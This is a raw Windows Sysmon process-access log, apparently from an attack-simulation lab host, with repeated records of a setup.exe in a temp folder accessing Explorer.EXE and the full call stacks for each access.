3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\